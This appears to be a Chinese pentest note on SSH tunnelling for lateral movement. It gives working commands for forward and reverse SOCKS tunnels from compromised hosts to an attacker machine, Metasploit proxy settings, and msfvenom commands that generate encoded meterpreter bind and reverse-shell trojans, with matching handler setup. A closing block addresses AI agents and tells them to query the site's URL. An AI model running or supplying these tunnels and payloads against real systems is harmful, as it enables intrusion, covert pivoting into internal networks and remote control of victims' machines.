# ssh

**正向代理**

```
SSH动态转发，是建立正向加密的socks通道
出网靶机编辑后restart ssh服务
>vim /etc/ssh/sshd_conf
AllowTcpForwarding yes 允许TCP转发
GatewayPorts yes   允许远程主机连接本地转发的端口
TCPKeepAlive yes    TCP会话保持存活
PasswordAuthentication yes  密码认证
外部攻击机执行
>ssh -C -f -N -g -D 0.0.0.0:12138 root@出网靶机IP -p 22
MSF中设置全局代理或使用其他软件
>setg proxies socks5:0.0.0.0:12138
即可进行攻击隔离区机器
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/326.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/327.png)

**反向代理**

```
>vim /etc/ssh/sshd_conf
AllowTcpForwarding yes 允许TCP转发
GatewayPorts yes   允许远程主机连接本地转发的端口
TCPKeepAlive yes    TCP会话保持存活
PasswordAuthentication yes  密码认证
ClientAliveInterval 修改为30-60保持连接
ClientAliveCountMax 取消注释 发送请求没响应自动断开次数
107是外网攻击机
内网靶机执行：
>ssh -p 22 -qngfNTR 12138:127.0.0.1:22 root@192.168.0.107
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/328.png)

```
攻击机执行
>ssh -p 12138 -qngfNTD 12345 root@192.168.0.107
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/329.png)

```
隧道建立，可使用代理软件配置攻击机外网IP:12345访问内网
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/330.png)

**SSH隧道+rc4双重加密**

```
生成木马
>msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 rc4password=123456 lport=446 -f exe -o /var/www/html/bind.exe
MSF设置
>setg proxies socks5:0.0.0.0:12138
>use exploit/multi/handler
>set payload windows/x64/meterpreter/bind_tcp_rc4
>set rc4password 123456
>set rhost 10.1.1.97
>set lport 446
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/331.png)

**公网SSH隧道+Local MSF**

```
>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=公网IP LPORT=12138 -f exe –o /var/www/html/1.exe
Handler监听本地IP:12138
SSH转发
>ssh -N -R 12138:本地内网IP:12138 root@公网IP
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/heng-xiang-yi-dong/dai-li/ssh.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.